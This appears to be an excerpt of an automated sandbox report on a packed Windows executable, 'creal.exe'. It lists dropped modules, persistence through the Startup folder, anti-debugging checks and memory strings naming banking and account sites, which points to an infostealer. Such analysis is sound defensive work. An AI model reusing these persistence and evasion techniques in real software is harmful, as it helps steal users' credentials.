            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_ctypes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\python312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_wmi.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Protocol\_scrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Users\user\Desktop\creal.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16318
            Source: C:\Users\user\Desktop\creal.exeAPI coverage: 1.8 %
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\creal.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A608B00 FindFirstFileExW,FindClose,0_2_00007FF67A608B00
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF67A617F4C
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A621FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF67A621FE4
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A617F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF67A617F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CE8B00 FindFirstFileExW,FindClose,26_2_00007FF7C3CE8B00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3CF7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,26_2_00007FF7C3CF7F4C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D01FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_00007FF7C3D01FE4
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68C1490 GetSystemInfo,2_2_00007FF8E68C1490
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: creal.exe, 0000001A.00000003.1546499713.0000025EFD905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ansaction PasswordVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: creal.exe, 00000002.00000003.1521292188.00000185BB369000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1516110716.00000185BB358000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1518329891.00000185BB35B000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1550841441.00000185BB36F000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000003.1525447368.00000185BB36B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: creal.exe, 00000002.00000003.1451291180.00000185BC97D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fYNTuOdd/rzr4daYCSlH/cjDCL3gxrmBUY6glAujRG+XsNgB8m+miTjegHFottrEaMGztw6jlxPwp8utWtvuF+P406voTx9Wltl3E/5lGVHZO7Qh5ejQhhFihjaCUi6MEor4Vj/NhscRXP5vyZCubEizzJAyXtsIMrKDuopDcRMMFbv6vBv6z++TpP7ZBgP1ako6UXVMcir1+swte3aZvpyZd+T7mVpjZqlgwRH3Ayl5z1nbXp6eqzQwKdul+SvLGL+tLe/jPr5yXn5sujJvEz0PvGAL9aK/teXD3kJlu1LvwMFdtjHsCSYee9T7mpKGgbpYqSMjRK1UvNA3tykU+ua+YqFvYe2coLaXZxaMAuWZBS9ZnjmEQk5I4Zr0dB81ix5vIHY8G2diStelUx7kLB7lXCzK3mBbobM/ToJthRZhg21FUstFUGMwyKiV52CQkQuUxSDjUM1FU0XjqgLN2GVx7+9PbfVt9x9ISU/bDXe31+2Fytxt4aa3
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: curl.exe, 00000008.00000003.1468606378.000001F32FE33000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000B.00000003.1480700681.0000024F21CC4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1495934456.0000021D976C7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1499016491.0000018B7EC38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000014.00000002.1500645147.00000281E010B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000018.00000002.1502681292.000002B6485A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: creal.exe, 00000002.00000002.1571908402.00000185BCAD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A61ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF67A61ACD8
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A623BF0 GetProcessHeap,0_2_00007FF67A623BF0
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A61ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF67A61ACD8
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A60C860 SetUnhandledExceptionFilter,0_2_00007FF67A60C860
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A60BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF67A60BDE0
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A60C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF67A60C67C
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E69DABE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E69DABE0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6EF1460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6EF1460
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6EF1A30 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6EF1A30
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F01390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F01390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F01960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F01960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F11390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F11390
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F11960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E6F11960
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E6F21390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8E6F21390
